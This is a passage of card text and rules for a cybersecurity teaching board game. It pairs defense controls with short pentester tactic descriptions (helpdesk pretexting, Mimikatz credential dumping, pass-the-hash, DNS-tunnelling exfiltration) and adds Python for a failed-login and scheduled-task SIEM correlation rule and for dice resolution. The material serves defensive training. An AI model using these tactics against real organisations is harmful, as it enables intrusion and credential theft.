Used Against: T-04, T-05, T-06, T-07, T-08, T-09 (Detection across entire chain)
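The D-10 card names "failed login spikes" and "scheduled task creation" among the patterns a SIEM rule should correlate. As an added example (not code from the Incident Zero project, and not from any SIEM product), the block below implements that correlation over a constructed set of Windows-style logon events: a burst of failed logons (Event ID 4625) for one account from one host inside a short window raises a spike alert, a successful logon (4624) shortly after the spike raises a second alert, and a scheduled task created (4698) soon after that success raises a third. The log lines, field layout, thresholds and function names are constructed for the example; only the event IDs are the standard Windows Security log values.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events, not real logs.
# Fields: timestamp | Windows event id | account | source host
# 4625 = failed logon, 4624 = successful logon, 4698 = scheduled task created.
SAMPLE_EVENTS = """\
2026-07-01T09:00:01|4625|alice|WS-15
2026-07-01T09:00:03|4625|alice|WS-15
2026-07-01T09:00:05|4625|alice|WS-15
2026-07-01T09:00:07|4625|alice|WS-15
2026-07-01T09:00:09|4625|alice|WS-15
2026-07-01T09:00:12|4624|alice|WS-15
2026-07-01T09:01:40|4698|alice|WS-15
2026-07-01T09:30:00|4625|bob|WS-22
2026-07-01T10:15:00|4625|bob|WS-22
2026-07-01T10:15:30|4624|bob|WS-22
"""


def parse_events(text):
    """Parse the pipe-delimited sample format into (time, event_id, user, host) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, host = line.split("|")
        events.append((datetime.fromisoformat(ts), int(eid), user, host))
    events.sort()   # correlation assumes time order
    return events


def correlate(events, threshold=5, window=timedelta(minutes=5),
              follow_up=timedelta(minutes=10)):
    """Three chained correlation rules keyed on (account, source host):

    FAILED_LOGIN_SPIKE   >= threshold 4625 events inside `window`
    SPIKE_THEN_SUCCESS   a 4624 within `follow_up` of a spike
    SUCCESS_THEN_SCHTASK a 4698 within `follow_up` of a spike-then-success

    Returns alerts as (rule, user, host, time) tuples, in time order.
    """
    fails = defaultdict(deque)   # sliding window of failure timestamps per key
    spike_at = {}                # key -> time of the last spike alert
    success_at = {}              # key -> time of the post-spike success
    alerts = []
    for ts, eid, user, host in events:
        key = (user, host)
        if eid == 4625:
            q = fails[key]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                alerts.append(("FAILED_LOGIN_SPIKE", user, host, ts))
                spike_at[key] = ts
                q.clear()                      # one alert per burst
        elif eid == 4624 and key in spike_at and ts - spike_at[key] <= follow_up:
            alerts.append(("SPIKE_THEN_SUCCESS", user, host, ts))
            success_at[key] = ts
        elif eid == 4698 and key in success_at and ts - success_at[key] <= follow_up:
            alerts.append(("SUCCESS_THEN_SCHTASK", user, host, ts))
    return alerts


def alert_summary(text=SAMPLE_EVENTS):
    """(rule, user) pairs only, convenient for checking which rules fired."""
    return [(a[0], a[1]) for a in correlate(parse_events(text))]


if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS)):
        print(*alert)
```

On the sample data only alice's burst trips the chain; bob's two failures are 45 minutes apart, so the sliding window never holds more than one and no alert fires. The deque-based window is the piece that keeps the rule cheap enough to run on every event rather than re-scanning history.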


D-11: Data Loss Prevention (DLP)

Tier: ADVANCED (15 Budget) Vector: DATA_EXFIL

Deploy DLP to monitor outbound data transfers. Classify sensitive data (customer PII, source code, trade secrets). Block or alert on unauthorized transfers.

Effect: Prevents SQL database exfiltration and bulk data theft. Detects unusual data access patterns. Enforces data security policies.

Used Against: T-10, T-11, T-12 (Data exfiltration attacks)


D-12: Password Manager & Vault

Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE

Deploy enterprise password vault (CyberArk, HashiCorp Vault). Enforce strong unique passwords. Implement password rotation policies for service accounts.

Effect: Prevents credential reuse attacks. Makes credential stuffing difficult. Provides audit trail for compliance and incident investigation.

Used Against: T-03, T-06 (Credential attacks)


D-18: Intrusion Prevention System (IPS)

Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; IPS/WAF appliances are standard mid-tier controls) Vector: WEB_EXPLOIT

Deploy network-based IPS with exploit signatures. Monitor for known CVE exploitation patterns. Configure WAF (Web Application Firewall) rules for SQL injection, XSS, and OWASP Top 10 attacks.

Effect: Blocks exploitation attempts in transit. Prevents watering hole and web exploit attacks. Most effective when combined with patching.

Used Against: T-02 (Watering Hole), T-05 (Exploits)


D-24: Threat Intelligence Integration

Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; community feeds like MISP/OTX are affordable) Vectors: NETWORK, DATA_EXFIL (v2.2 — dual-tagged; counts as a match for either vector)

Subscribe to threat intelligence feeds (MISP, VirusTotal, AlienVault OTX). Integrate IOCs (Indicators of Compromise) into firewall, SIEM, and proxy. Participate in information sharing communities.

Effect: Enables faster detection of known malicious IPs and domains. Identifies emerging threats targeting your industry. Reduces detection time from days to minutes.

Used Against: T-09 (C2 Beaconing), T-10, T-11, T-12 (Exfil detection)


ELITE TIER DEFENSES (25 Budget Each)

D-13: Threat Hunting Program

Tier: ELITE (25 Budget) Vector: MALWARE

Establish proactive threat hunting using MITRE ATT&CK framework. Hunt for living-off-the-land techniques, anomalous processes, suspicious registry changes, and memory injection.

Effect: Finds advanced attacks that bypass signature-based detection. Detects LSASS dumping, scheduled task persistence, and registry backdoors. Reduces dwell time significantly.

Used Against: T-05, T-07, T-08 (Advanced persistence)


D-14: Memory Forensics

Tier: ELITE (25 Budget) Vector: MALWARE

Deploy memory capture and analysis (Volatility, Memoryze). Create memory images of suspicious systems. Analyze for credential dumping, injected code, and rootkits.

Effect: Detects Mimikatz attacks and credential harvesting. Reveals attacker activities hidden from disk forensics. Critical for identifying advanced persistence mechanisms.

Used Against: T-06 (Mimikatz), T-07, T-08 (In-memory attacks)


D-15: Deception Technology (Honeypots)

Tier: ELITE (25 Budget) Vector: NETWORK

Deploy decoy systems (fake file servers, databases, credentials) to detect lateral movement. Create canary tokens that alert when accessed.

Effect: Any access to honeypots indicates active compromise. Detects lateral movement with zero false positives. Slows attacker progress and forces reconnaissance.

Used Against: T-04 (Lateral Movement), T-06 (Credential abuse)


D-16: Credential Guard & Secure Boot

Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE

Enable Windows Credential Guard to isolate LSASS in virtualized container. Implement UEFI Secure Boot to prevent bootkit attacks. Enable TPM attestation.

Effect: Makes Mimikatz credential dumping ineffective. Prevents bootloader manipulation. Ensures firmware integrity. Blocks entire classes of early-boot attacks.

Used Against: T-06 (Mimikatz), T-07, T-08 (Persistence)


D-17: Advanced Malware Sandbox

Tier: ELITE (25 Budget) Vector: MALWARE

Deploy advanced sandboxing solution (Cuckoo, Detonate, hybrid-analysis). Analyze suspicious files/URLs in isolated environments. Generate behavioral indicators and YARA rules.

Effect: Detects zero-day malware and unknown exploits. Analyzes evasion tactics. Generates detection rules for SIEM. Prevents spread of novel malware.

Used Against: T-05 (Privilege Escalation), T-07, T-08 (Malware persistence)


D-20: Zero Trust Access Control

Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE

Implement zero-trust architecture: verify every access request regardless of source. Deploy device identity, user identity, and behavior analytics. Implement conditional access policies.

Effect: Eliminates implicit trust based on network location. Even compromised devices cannot access sensitive resources without proper authentication and behavior validation.

Used Against: T-03, T-06 (Credential abuse), T-04 (Lateral movement)


D-21: Container Security & Orchestration

Tier: ELITE (25 Budget) Vector: MALWARE

Deploy container runtime security (Falco, Sysdig). Implement image scanning for vulnerabilities. Use policy enforcement engines (OPA/Gatekeeper). Implement network policies for container segmentation.

Effect: Detects container escape attempts. Prevents vulnerable images from running. Limits lateral movement within containerized environments. Critical for modern cloud applications.

Used Against: T-05 (Priv Esc), T-04 (Lateral Movement in cloud)


D-22: Security Information & Event Management (SIEM)

Tier: ELITE (25 Budget) Vector: NETWORK

Deploy enterprise SIEM (Splunk, ELK, QRadar). Centralize logs from all sources. Implement automated correlation rules, threat intelligence integration, and incident response workflows.

Effect: Provides centralized visibility into all security events. Enables rapid threat detection and investigation. Foundation for mature incident response program.

Used Against: T-04, T-06, T-07, T-08, T-09, T-10 (Detection across entire attack chain)


Defense Card Summary

Distribution by Tier (v2.2)

Distribution by Vector (v2.2)

Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA_EXFIL) and appears in both rows, so vector-row counts sum to 25 tags across 24 cards.


How These Cards Are Used in Hardening

Deploy Action

Blue Team selects a Defense Card from their hand and deploys it:
  - Cost: 10/15/25 Budget depending on tier
  - Roll Required: None—automatic success
  - Effect: Defense immediately becomes active and counts toward Security Score
  - (v2.2) Two BASIC defenses may be deployed together as a single action

Pentester Challenge (v2.2 — one canonical formula)

When a Pentester Tactic is drawn (see Pentester Tactic Cards file), the Blue Team chooses one deployed defense to resolve it with:

Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)

Success if the total is ≥ the tactic card's printed DC.

See Module: Hardening for the full resolution procedure and a worked example.

Strategic Layering

Multiple defenses work together:
  - BASIC defenses are cheap but carry small printed bonuses against tactics
  - ADVANCED defenses provide good cost/effectiveness balance
  - ELITE defenses are expensive but carry the largest printed bonuses against sophisticated tactics
  - Layering across vectors matters: each tactic card lists which defenses earn bonuses, so broad coverage means you always have a strong defense to choose


Print Instructions

  1. Print on cardstock (250 gsm minimum) for durability
  2. Cut along dotted lines
  3. Optional: Laminate or use sleeves for durability and reusability
  4. Consider color-coding by vector for visual quick reference:
     - SOCIAL_ENGINEERING: Red
     - WEB_EXPLOIT: Orange
     - CREDENTIAL_ABUSE: Blue
     - MALWARE: Purple
     - NETWORK: Green
     - DATA_EXFIL: Cyan

Notes on Card Reusability

These 24 Defense Cards are the same cards used in the Incident Response module. The difference in usage:

This allows educators to:
  - Use one physical deck for both modules
  - Teach defense-in-depth concepts in sequence
  - Show how defenses complement each other


Hardening Module: Defense Cards
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition

cards/hardening/core-deck/pentester-tactic-cards.md

Hardening Module: Pentester Tactic Cards

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Overview

Pentester Tactic Cards are unique to the Hardening Module. These 8 cards represent real-world red team attack tactics that challenge the defenses the Blue Team has deployed.


Core Concept

During the Hardening module gameplay:

  1. Blue Team Deploys Defenses - Accumulate defensive controls across the 7-turn game (v2.2)
  2. Pentester Challenge Occurs - Red team launches simulated attack
  3. Defense Test - Deployed defenses are tested against the tactic
  4. Resolution - Blue Team rolls d20 + modifiers to see if defense holds
  5. Learning Moment - Whether attack succeeds or fails, discuss why

Pentester Tactic Cards

PT-01: Social Engineering - Pretexting Attack

Tactic Type: Initial Access / Social Engineering Target Vectors: SOCIAL_ENGINEERING, CREDENTIAL_ABUSE Difficulty: BASIC (defeat DC 12)

Description: A pentester calls your IT helpdesk impersonating a VIP executive. They claim to be traveling without their laptop and need emergency access to critical systems. They pressure the helpdesk with urgency and authority. Can they bypass your security procedures?

Attack Details:
  - Targets: User security training gaps, process enforcement
  - Success indicates: Social engineering protocols aren't followed
  - Blue Team rolls 1d20 to resist

Defending Defenses:
  - D-02 (User Security Training): +2 bonus (staff trained to verify callers)
  - D-07 (MFA): +1 bonus (second factor still required)
  - D-23 (IR Program & Runbooks): +2 bonus (clear escalation procedures)

Outcome:
  - Blue Team Succeeds (12+): Helpdesk follows proper verification procedures, attacker is denied
  - Blue Team Fails: Attacker gains credentials or system access; Blue Team must deploy additional defenses

Teaching Point: Social engineering exploits human psychology and organizational process gaps. Technology alone cannot defend against this; training and procedures are essential.


PT-02: Malware Evasion - Living-off-the-Land Technique

Tactic Type: Persistence & Execution Target Vectors: MALWARE, CREDENTIAL_ABUSE Difficulty: INTERMEDIATE (defeat DC 13)

Description: A pentester delivers a payload that uses only built-in Windows tools (PowerShell, scheduled tasks, registry modifications, WMI) to maintain persistence and establish a beachhead. No suspicious files, no external C2 traffic—just legitimate Windows features weaponized. Can your defenses detect this?

Attack Details:
  - Targets: Traditional antivirus, signature-based detection
  - Success indicates: Blind spot in malware detection strategy
  - Blue Team rolls 1d20 to detect and block

Defending Defenses:
  - D-06 (Basic Antivirus): +1 bonus only (signatures don't catch living-off-the-land)
  - D-08 (EDR): +3 bonus (behavioral detection catches anomalous PowerShell/schtasks)
  - D-13 (Threat Hunting): +2 bonus (proactive hunting finds MITRE ATT&CK techniques)
  - D-14 (Memory Forensics): +2 bonus (finds injected code in memory)

Outcome:
  - Blue Team Succeeds (13+): EDR or threat hunting detects the attack before persistence is established
  - Blue Team Fails: Attacker establishes persistent access; Blue Team must escalate incident response

Teaching Point: Signature-based defenses are insufficient against sophisticated attackers. Behavioral detection and proactive hunting are essential for modern threats.


PT-03: Credential Dumping - Mimikatz Attack

Tactic Type: Privilege Escalation / Credential Access Target Vectors: CREDENTIAL_ABUSE, MALWARE Difficulty: INTERMEDIATE (defeat DC 13)

Description: A pentester with local admin privileges attempts to dump LSASS memory and extract cached domain credentials using Mimikatz. These credentials could then be used for lateral movement and privilege escalation. Can your endpoint defenses prevent this?

Attack Details:
  - Targets: LSASS memory protection, credential storage hardening
  - Success indicates: Weak credential protection on endpoints
  - Blue Team rolls 1d20 to block the attack

Defending Defenses:
  - D-07 (MFA): +1 bonus only (doesn't protect cached credentials)
  - D-12 (Password Vault): +2 bonus (service accounts in vault aren't in LSASS)
  - D-14 (Memory Forensics): +2 bonus (detects LSASS tampering)
  - D-16 (Credential Guard & Secure Boot): +4 bonus (isolates LSASS in virtualized container—primary defense)
  - D-08 (EDR): +2 bonus (alerts on suspicious LSASS access)

Outcome:
  - Blue Team Succeeds (13+): Credential Guard blocks the attack or EDR detects the attempt
  - Blue Team Fails: Domain credentials compromised; Blue Team loses future rolls vs. credential-based attacks (-1 penalty for remaining game)

Teaching Point: Privileged credential protection is critical. Credential Guard is the gold standard for endpoint protection. Service account password rotation and vaults prevent cached credential abuse.


PT-04: Lateral Movement - Network Traversal

Tactic Type: Lateral Movement
Target Vectors: NETWORK, CREDENTIAL_ABUSE
Difficulty: INTERMEDIATE (defeat DC 13)

Description: A pentester with access to one workstation attempts to move laterally across your network using SMB share enumeration, pass-the-hash attacks, and exploitation of unsecured share access. Can your network architecture and controls prevent this?

Attack Details:
  - Targets: Network segmentation, share access controls
  - Success indicates: Flat network with unrestricted SMB traffic
  - Blue Team rolls 1d20 + architecture modifiers

Defending Defenses:
  - D-04 (Firewall Rules): +1 bonus (blocks some traffic, but not SMB on internal network)
  - D-09 (Network Segmentation): +3 bonus (restricts SMB traffic between segments)
  - D-10 (SIEM Correlation): +2 bonus (detects lateral movement patterns)
  - D-15 (Honeypots): +2 bonus (attacker triggers canary token)
  - D-20 (Zero Trust Access): +3 bonus (even lateral access requires authentication)

Outcome:
  - Blue Team Succeeds (13+): Network segmentation or honeypots stop the attack
  - Blue Team Fails: Attacker establishes foothold on file server or domain controller; future defense deployments cost 1.5x Budget

Teaching Point: Flat networks are indefensible. Network segmentation combined with zero-trust access controls is essential. Honeypots are low-cost but highly effective deterrents.


PT-05: Privilege Escalation - Unpatched Kernel Exploit

Tactic Type: Privilege Escalation
Target Vectors: MALWARE, WEB_EXPLOIT
Difficulty: ADVANCED (defeat DC 14)

Description: A pentester discovers an unpatched vulnerability in a critical Windows kernel or third-party driver. They develop a local privilege escalation exploit that elevates from user to SYSTEM privileges. Can your patch management and detection systems catch this?

Attack Details:
  - Targets: Patch management gaps, detection of privilege escalation
  - Success indicates: Unpatched systems or poor vulnerability management
  - Blue Team rolls 1d20 to patch or detect

Defending Defenses:
  - D-03 (Windows Patching): +3 bonus (prevents the vulnerability from existing)
  - D-05 (Log Centralization): +1 bonus (may detect unusual privilege elevation attempts)
  - D-08 (EDR): +3 bonus (behavioral detection alerts on privilege escalation)
  - D-13 (Threat Hunting): +2 bonus (proactive hunting finds unpatched systems)

Outcome:
  - Blue Team Succeeds (14+): Patch management or EDR prevents or detects the exploit before escalation
  - Blue Team Fails: Attacker gains system-level access; all subsequent attacks get +1 bonus, all defensive deployments get -1 penalty for remainder of game

Teaching Point: Patch management is one of the highest-ROI security controls. Unpatched systems are low-hanging fruit for attackers. Automated patching and vulnerability scanning are essential.


PT-06: Data Exfiltration - Unmonitored Channel

Tactic Type: Exfiltration
Target Vectors: DATA_EXFIL, NETWORK
Difficulty: ADVANCED (defeat DC 14)

Description: A pentester with network access attempts to exfiltrate sensitive data (customer database, source code, trade secrets) via an unmonitored channel: DNS tunneling, steganography in image uploads, or a rogue cloud storage account. Can your DLP and monitoring systems catch this?

Attack Details:
  - Targets: Data loss prevention, network monitoring blind spots
  - Success indicates: Unsupervised data channels or weak DLP enforcement
  - Blue Team rolls 1d20 to detect and block

Defending Defenses:
  - D-04 (Firewall Rules): +1 bonus (may block some exfil channels)
  - D-05 (Log Centralization): +1 bonus (may reveal unusual network traffic)
  - D-10 (SIEM Correlation): +2 bonus (detects anomalous data transfer patterns)
  - D-11 (DLP): +4 bonus (primary defense against data exfil)
  - D-22 (SIEM): +2 bonus (detects data access and transfer anomalies)
  - D-24 (Threat Intelligence): +1 bonus (identifies known C2 domains/IPs)

Outcome:
  - Blue Team Succeeds (14+): DLP or network monitoring detects and blocks the exfil attempt
  - Blue Team Fails: Data is exfiltrated; Blue Team immediately loses the game (breach is complete)

Teaching Point: DLP and network monitoring are essential for preventing data loss. Organizations must understand their critical data flows and monitor them accordingly.


PT-07: Supply Chain Compromise - Trusted Software Update

Tactic Type: Initial Access / Persistence
Target Vectors: MALWARE, WEB_EXPLOIT
Difficulty: ADVANCED (defeat DC 14)

Description: A pentester compromises a software vendor that your organization trusts. They inject malicious code into a legitimate update that your organization automatically deploys. The malware is signed with the vendor's legitimate certificate. Can you detect and prevent this?

Attack Details:
  - Targets: Update management, supply chain security, behavioral detection
  - Success indicates: Over-trust in vendor updates, poor verification procedures
  - Blue Team rolls 1d20 to detect or prevent

Defending Defenses:
  - D-03 (Windows Patching): +0 bonus (legitimate patch—can't be distinguished)
  - D-06 (Antivirus): +1 bonus only (legitimate signature—won't help)
  - D-08 (EDR): +3 bonus (behavioral detection catches malicious activity after installation)
  - D-13 (Threat Hunting): +2 bonus (proactive hunting for suspicious post-update behavior)
  - D-17 (Malware Sandbox): +2 bonus (detonates update before deployment)
  - D-21 (Container Security): +2 bonus (prevents compromise spread in containerized environments)

Outcome:
  - Blue Team Succeeds (14+): EDR or threat hunting detects malicious behavior before widespread compromise
  - Blue Team Fails: Supply chain compromise spreads across organization; -2 penalty to all defense rolls for remainder of game

Teaching Point: Trust is not security. Even legitimate vendors can be compromised. Behavioral detection, code signing verification, and staged rollouts are essential.


PT-08: Insider Threat - Malicious Administrator

Tactic Type: Privilege Abuse / Data Exfiltration
Target Vectors: CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK
Difficulty: EXPERT (defeat DC 15)

Description: A pentester acts as a disgruntled administrator with legitimate system access. They use their privileges to bypass security controls, disable logging, create backdoor accounts, and exfiltrate sensitive data. Can your controls prevent insider threats?

Attack Details:
  - Targets: Administrative account monitoring, privilege abuse detection
  - Success indicates: Weak monitoring of privileged access, overly broad admin permissions
  - Blue Team rolls 1d20 to detect and prevent

Defending Defenses:
  - D-05 (Log Centralization): +2 bonus (immutable offsite logs prevent tampering)
  - D-07 (MFA): +1 bonus (makes it harder to create backdoor accounts)
  - D-10 (SIEM Correlation): +2 bonus (detects unusual admin activity patterns)
  - D-12 (Password Vault): +2 bonus (requires approval/audit for privileged access)
  - D-20 (Zero Trust Access): +3 bonus (even admins require proper authorization for sensitive access)
  - D-22 (SIEM): +3 bonus (behavioral analytics detect insider threats)
  - D-23 (IR Program & Runbooks): +1 bonus (clear escalation for suspicious admin activity)

Outcome:
  - Blue Team Succeeds (15+): Monitoring detects unauthorized admin activity before damage
  - Blue Team Fails: Insider exfiltrates data and disables controls; Blue Team loses game immediately and additional penalties apply to Disaster Recovery module (if played next)

Teaching Point: Insider threats are one of the hardest problems in security. Prevention is impossible; detection is essential. Privileged access management, behavioral monitoring, and immutable audit logs are critical.


Pentester Tactic Card Summary

| Card | Tactic | Vectors | Difficulty | Primary Defense |
|------|--------|---------|------------|-----------------|
| PT-01 | Social Engineering | SE, CA | BASIC (DC 12) | User Training |
| PT-02 | Malware Evasion | MALWARE, CA | INTERMEDIATE (DC 13) | EDR |
| PT-03 | Credential Dumping | CA, MALWARE | INTERMEDIATE (DC 13) | Credential Guard |
| PT-04 | Lateral Movement | NETWORK, CA | INTERMEDIATE (DC 13) | Network Segmentation |
| PT-05 | Privilege Escalation | MALWARE, WEB | ADVANCED (DC 14) | Patch Management |
| PT-06 | Data Exfiltration | EXFIL, NETWORK | ADVANCED (DC 14) | DLP |
| PT-07 | Supply Chain Compromise | MALWARE, WEB | ADVANCED (DC 14) | EDR/Threat Hunting |
| PT-08 | Insider Threat | CA, EXFIL, NETWORK | EXPERT (DC 15) | Privileged Access Monitoring |

How Pentester Tactics Are Used in Gameplay

Timing

Pentester Tactics are typically drawn during turns 3-4 of the 7-turn game (v2.2). This gives the Blue Team time to deploy initial defenses but creates time pressure for the final deployment phase.

Resolution (v2.2 — one canonical formula)

When a Pentester Tactic is drawn:

  1. Announce the Attack: Read the tactic description to the Blue Team
  2. Blue Team Chooses ONE Deployed Defense: Pick the defense you resolve this tactic with (it must be deployed)
  3. Roll:

Defense roll = d20 + printed defense bonus for the chosen defense (from this tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)

  1. Compare to DC: If total ≥ the tactic's printed DC, the tactic fails; if < DC, the tactic succeeds
  2. Apply Consequences: Based on success or failure

Notes:
  - Only ONE defense's printed bonus applies per roll—there is no stacking of multiple defenses on a single roll. Layering still matters: broad coverage means a strong printed bonus is always available to choose.
  - If the chosen defense is not listed on the tactic card, its printed bonus is +0 (upgrades and playbooks still apply).
  - Multi-vector or multi-phase tactics (e.g., PT-09 in the expansion): resolve each vector/phase as a separate roll, choosing one defense for each roll.

See Module: Hardening for the full procedure and a worked example.
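The v2.2 resolution procedure above, carried through in code. This is an added example, not the game's own material or a published reference implementation: it encodes the canonical formula (d20 + ONE chosen defense's printed bonus, +0 if that defense is not on the card, +2 per hardening upgrade, +3 for a relevant playbook) against the tactic's DC, and resolves multi-phase tactics such as PT-09 with one roll per phase. The card bonus tables for PT-03 and PT-09 are transcribed from this page; the `best_choice` rule (pick the deployed defense with the largest modifier) and the `card_effect` argument used for PT-09's Full Coverage +1 are assumptions of this example, as is passing the d20 results in so that the outcome is reproducible at the table.

```python
"""Tactic resolution for Incident Zero v2.2 (added example, not the game's own code).

Canonical formula from Module: Hardening:
    defense roll = d20
                 + printed bonus of the ONE chosen defense (from the tactic card; +0 if unlisted)
                 + 2 per hardening upgrade on that defense
                 + 3 if a relevant playbook applies
The tactic fails when the roll is >= the card's printed DC.
Multi-phase tactics are resolved with one roll per phase.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Difficulty -> DC mapping printed on the expansion deck header.
DC_BY_DIFFICULTY = {"BASIC": 12, "INTERMEDIATE": 13, "ADVANCED": 14, "EXPERT": 15, "EXPERT+": 16}


@dataclass
class Phase:
    name: str
    bonuses: Dict[str, int]  # defense card id -> printed bonus for this card/phase


@dataclass
class Tactic:
    card: str
    difficulty: str
    phases: List[Phase]  # single-phase cards have exactly one entry


@dataclass
class Deployed:
    """A defense the Blue Team currently has on the table."""
    card: str
    upgrades: int = 0      # hardening upgrades on this defense, +2 each
    playbook: bool = False  # relevant playbook attached, +3


def modifier(defense: Deployed, phase: Phase) -> int:
    """Everything added to the d20 when this defense is chosen for this phase."""
    printed = phase.bonuses.get(defense.card, 0)  # not listed on the card: +0 printed bonus
    return printed + 2 * defense.upgrades + (3 if defense.playbook else 0)


def best_choice(deployed: List[Deployed], phase: Phase) -> Deployed:
    """Assumed table rule: the Blue Team picks the ONE deployed defense with the largest modifier."""
    return max(deployed, key=lambda d: modifier(d, phase))


def resolve(tactic: Tactic, deployed: List[Deployed], rolls: List[int],
            card_effect: int = 0) -> Tuple[bool, list]:
    """Resolve a tactic. rolls holds the d20 result for each phase, in order.
    card_effect is a flat bonus on every phase roll (e.g. PT-09 Full Coverage: +1).
    Returns (blocked on every phase?, per-phase detail tuples)."""
    dc = DC_BY_DIFFICULTY[tactic.difficulty]
    if len(rolls) != len(tactic.phases):
        raise ValueError("exactly one d20 result per phase is required")
    detail = []
    for phase, d20 in zip(tactic.phases, rolls):
        chosen = best_choice(deployed, phase)
        total = d20 + modifier(chosen, phase) + card_effect
        detail.append((phase.name, chosen.card, total, dc, total >= dc))
    return all(entry[4] for entry in detail), detail


# Bonus lists transcribed from the PT-03 and PT-09 cards on this page.
PT03 = Tactic("PT-03", "INTERMEDIATE", [
    Phase("Credential Dumping", {"D-07": 1, "D-12": 2, "D-14": 2, "D-16": 4, "D-08": 2}),
])
PT09 = Tactic("PT-09", "ADVANCED", [
    Phase("Phase 1 Social Engineering", {"D-02": 2, "D-23": 2}),
    Phase("Phase 2 Malware", {"D-06": 1, "D-08": 3, "D-13": 2, "D-17": 2}),
    Phase("Phase 3 Lateral Movement", {"D-04": 1, "D-09": 3, "D-10": 2, "D-15": 2}),
    Phase("Phase 4 Data Exfil", {"D-11": 4, "D-22": 2, "D-24": 1}),
])


if __name__ == "__main__":
    # Worked example: D-16 with one upgrade and a playbook, d20 shows 4 -> 4 + 4 + 2 + 3 = 13, meets DC 13.
    table = [Deployed("D-16", upgrades=1, playbook=True), Deployed("D-04")]
    blocked, detail = resolve(PT03, table, rolls=[4])
    for name, card, total, dc, ok in detail:
        print(f"{name}: chose {card}, total {total} vs DC {dc} -> {'blocked' if ok else 'SUCCEEDS'}")
    print("tactic blocked" if blocked else "tactic succeeds")
```

The per-phase detail shows why one strong, upgraded defense with a playbook can carry a roll that a listed-but-unupgraded defense would lose, and why an unlisted defense (D-04 against PT-03) contributes nothing beyond its upgrades and playbook.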

Difficulty Progression


Design Philosophy

Each Pentester Tactic represents a real-world attack pattern that:

  1. Is realistic - Based on actual TTPs (Tactics, Techniques, Procedures) from MITRE ATT&CK
  2. Teaches defense priorities - Success requires defense-in-depth, not single solutions
  3. Demonstrates gaps - Failing a tactic shows where the defense strategy is weak
  4. Encourages layering - Multiple defenses together are stronger than any single defense


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use a different color scheme from Defense Cards (suggest: RED background with black text to indicate the "attack" phase, compared to the BLUE background of Defense Cards for the "defense" phase)
  3. Cut along dotted lines
  4. These should be shuffled and kept separate from Defense Cards during gameplay

Expansion Possibilities

For advanced gameplay, 8 additional Pentester Tactics are available:
  - PT-09: Multi-Vector Attack (combines multiple tactics)
  - PT-10: Zero-Day Exploitation (signature-based defenses are useless)
  - PT-11: Ransomware Deployment & Encryption (requires backup verification)
  - PT-12: APT Campaign (multi-turn tactic with escalating difficulty)
  - PT-13: Cloud Misconfiguration Attack (for cloud-native environments)
  - PT-14: IoT/OT Compromise (for industrial environments)
  - PT-15: Firmware/BIOS Attack (hardware-level persistence)
  - PT-16: Container Escape (privilege escalation from containers)

See ../expansion-deck/advanced-tactics.md for these advanced cards.


Hardening Module: Pentester Tactic Cards
Part of Incident Zero, a modular cybersecurity board game, v2.2 - Playtest Edition

cards/hardening/expansion-deck/advanced-tactics.md

Hardening Module: Advanced Pentester Tactics (Expansion)

Version: 2.2 - Playtest Edition
Last Updated: July 2026

Difficulty → DC mapping (v2.2): BASIC = DC 12, INTERMEDIATE = DC 13, ADVANCED = DC 14, EXPERT = DC 15, EXPERT+ = DC 16. The Outcome threshold on every card equals its printed DC. Resolution uses the canonical formula in Module: Hardening: d20 + printed bonus for ONE chosen defense + upgrades (+2 each) + playbook (+3) vs DC.


Overview

Advanced Pentester Tactic Cards extend the core Hardening module with 8 sophisticated attack scenarios for experienced players and complex threat environments.


Advanced Pentester Tactics

PT-09: Multi-Vector Attack - Coordinated Campaign

Tactic Type: Advanced Persistence / Multi-Stage
Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL
Difficulty: ADVANCED (defeat DC 14)

Description: A pentester orchestrates a coordinated multi-vector attack that combines multiple tactics simultaneously: social engineering + malware + lateral movement + data exfiltration. Each phase is dependent on the previous one, and success in one area opens opportunities in others. Can your defenses coordinate to stop the full attack chain?

Attack Details:
  - Phase 1: Phishing delivers initial malware
  - Phase 2: Malware establishes persistence
  - Phase 3: Lateral movement to file server
  - Phase 4: Credential harvesting and exfiltration
  - Targets: Defense coordination, integrated threat response
  - Blue Team must roll separately for EACH phase

Defending Defenses:
  - Phase 1 (Social Engineering): D-02 (+2), D-23 (+2) for this phase
  - Phase 2 (Malware): D-06 (+1), D-08 (+3), D-13 (+2), D-17 (+2) for this phase
  - Phase 3 (Lateral Movement): D-04 (+1), D-09 (+3), D-10 (+2), D-15 (+2) for this phase
  - Phase 4 (Data Exfil): D-11 (+4), D-22 (+2), D-24 (+1) for this phase
  - Card Effect — Full Coverage: If Blue Team has deployed defenses covering all 4 targeted vectors, add +1 to each phase roll

Resolution (v2.2): Each phase is a separate roll against DC 14, with one chosen defense per roll (that phase's bonus list).

Outcome:
  - Blue Team Succeeds (14+ on every phase roll): Comprehensive defense stops the attack chain
  - Blue Team Fails ANY phase: Attack progresses; Blue Team loses 1d4 security score points per failed phase and must deploy emergency response

Teaching Point: Modern attacks are sophisticated and multi-faceted. No single defense can stop them. Comprehensive defense-in-depth with coordinated response is essential. Defense teams must practice responding to coordinated attacks.


PT-10: Zero-Day Exploitation - Unknown Vulnerability

Tactic Type: Initial Access / Execution
Target Vectors: MALWARE, WEB_EXPLOIT
Difficulty: EXPERT (defeat DC 15)

